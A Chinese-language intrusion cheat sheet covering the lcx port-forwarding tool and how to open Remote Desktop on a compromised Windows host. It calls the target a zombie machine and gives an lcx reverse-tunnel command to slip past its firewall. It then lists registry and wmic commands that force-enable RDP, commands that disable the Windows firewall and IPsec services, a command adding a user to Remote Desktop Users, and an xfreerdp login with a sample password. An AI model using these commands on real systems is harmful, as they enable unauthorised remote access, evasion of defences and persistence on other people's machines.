lcx是一款强大的内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口。它是一款命令行工具,当然也可以在有权限的webshell下执行,正因如此lcx常被认为是一款黑客入侵工具,lcx在内网入侵渗透中起着重要的角色。lcx进行端口转发的原理就是使不同端口之间形成一个回路。它常用于外网连接内网3389端口。
[option:]
-listen <ConnectPort> <TransmitPort> 连接端口 转发端口
-tran <ConnectPort> <TransmitHost> <TransmitPort> 连接端口 转发主机 转发端口
-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort> 连接主机 连接端口 转发主机 转发端口
lcx -tran 3390 127.0.0.1 3389
mstsc
连接目标ip:3390
肉鸡主动向外连接,绕过防火墙
lcx -slave 远程ip 8888 127.0.0.1 3389
lcx -listen 9999 8888
mstsc
远程ip:9999
远程终端的默认端口是3389,一般云服务器会开启,在较高的权限下可以使用注册表命令开启远程终端服务。
必须确保远程终端的服务首先是开启的
#查询Remote Desktop Services服务
net start |find "Remote Desktop Services"
#如果没有开启的话,手动开启
net start "Remote Desktop Services"
echo DO ALL IN CMD!
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t
REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
run getgui -e
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
**前提:**前提条件是确保“Windows Management Instrumentation(Winmgmt)”服务已正常启动。
**范围:**Win2k3/Win7/Win2k8/Win8.1/Win10/2012/2016(1:ON、0:OFF)
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\
#查看PortNumber字段
REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds" /s
REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP- Tcp" /v PortNumber
set /a Port=0xd3d (查询出来后转为整数结果为3389)
tasklist /svc | findstr "TermService" #查询服务进程号
netstat -ano | findstr "进程号" #根据服务的进程号查询端口
确定开启了远程终端并且端口没错的情况下 还是连不上目标 目标上的防火墙可能允许,这个时候可以使用lcx端口转发,或者使用命令关闭防火墙
#查询状态
netsh advfirewall show allprofile state
#关闭防火墙
netsh advfirewall set allprofiles state off
#关闭防火墙服务
net stop "Windows Firewall"
#禁用防火墙
sc config sharedaccess start= disabled
#关闭防火墙
net stop sharedaccess
在关闭防火墙时,还是连接不上,可能是ipsec做了ip策略处理,导致连接失败可以使用命令
net stop "IPsec Policy Agent"
sudo apt install freerdp2-x11
xfreerdp /f /u:administrator /p:123456 /v:192.168.0.118
net localgroup "Remote Desktop Users" darkid /add
mstsc /v:ip:3389 /console